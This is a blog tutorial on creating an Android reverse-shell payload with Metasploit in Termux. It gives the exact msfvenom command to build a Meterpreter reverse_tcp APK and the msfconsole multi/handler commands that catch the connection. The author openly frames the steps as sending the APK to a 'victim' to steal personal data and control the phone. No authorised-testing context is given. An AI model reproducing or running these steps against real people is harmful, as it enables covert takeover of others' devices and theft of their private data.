RHCE

How To Create Payload Using Termux?

In this article, I will teach you ‘ How can we create a Payload Using Termux’. Friends making a payload is not as hard as we think. It’s a simple process. But we need to install some prerequisites before making a payload. If we will not complete these steps then we cant create payload in Termux. So let’s discuss what are these requirements for making a payload –

Before making a payload we must know some basics of Payload like What is Payload? And how does Payload works? So friends the definition of the payload is given below –

What is Payload?

The payload refers to the actual section of information or data in a frame as opposed to automatically generated metadata. In information security, The payload is a section or part of a malicious and exploited code that causes potentially harmful activity and actions such as an exploit, opening backdoors, and hijacking.

How does payload work?

The payload can steal information by uploading the information to the remote server, download any file on the resident system, and manipulate the data and configuration. So basically payload steals our device’s info and upload this info to a remote server or to a resident server of an attacker. Generally, an attacker creates a payload in form of a mobile application or .exe format and injects this payload with third-party software. Sometimes attackers may be in our friend circle, so they directly can insert this payload into our device. Because nobody doubts on their friend. This type of activity can be said as shoulder surfing. After injecting this payload attacker send this application to his/her victim. And when the victim installs that application it asks for permission. Once the victim permitted the required permission, the attacker can easily steal the victim’s personal data without knowing the victim.

So to create a Payload, There are lots of tools available on the internet. But here we have an inbuilt tool in termux i.e. Metasploit-framework. In Kali-Linux OS Metasploit comes preinstalled but in termux we manually have to install the Metasploit. But before installing Metasploit we must-have info about Metasploit Framework. So let’s know What is Metasploit -framework?

Whats is Metasploit – Framework?

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7. According to Wikipedia

Now lets discuss the commands to install  Metasploit in termux –

$ pkg install unstable repo && pkg install metasploit

 Related :-  What is Termux App? How To Use Termux? Basic Commands of Termux for Beginner.

 

Now, let’s discuss how to create a payload using Metasploit?

First of all, you should open termux and type:

msfvenom -p android/meterpreter/reverse_tcp LHOST= X.X.X.X LPORT=4444  R >/sdcard/name.apk

-p = payload

android/meterpreter/reverse_tcp = Java-based Meterpreter allows to control victim over  a remote network

LHOST =  Local Host ( IP address of self )

X.X.X.X – Given IP Address

LPORT = Local Port ( choose any valid port )

/sdcard/name.apk = Give appropriate name to your payload

 

Now After some seconds it will appear a little message that shows the payload’s size.

Now check in the file manager on the internal storage of your mobile.

you’ll see the payload, now just send it to the victim or install the payload in a phone.

Once you have sent this payload to your victim, Now its time to set listener for your payload

How To Set Listener For Your Payload Connection?

open termux and type:

$ msfconsole
$ use multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set lhost Put-your-IP
$ set lport 4444
$ exploit

It’s all done now, when your victim clicks on the payload or run the payload, you will notice that the meterpreter session is opened. Once the meterpreter session started successfully, just type help to see what you can do with your victim.

Friends this is all about how to create a payload using termux? So friends still, if you have any queries or doubts about this post, do not hesitate to contact me. If you like our post, then share it with your friends. And if you have any suggestions for me, please write to me in the comment box.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s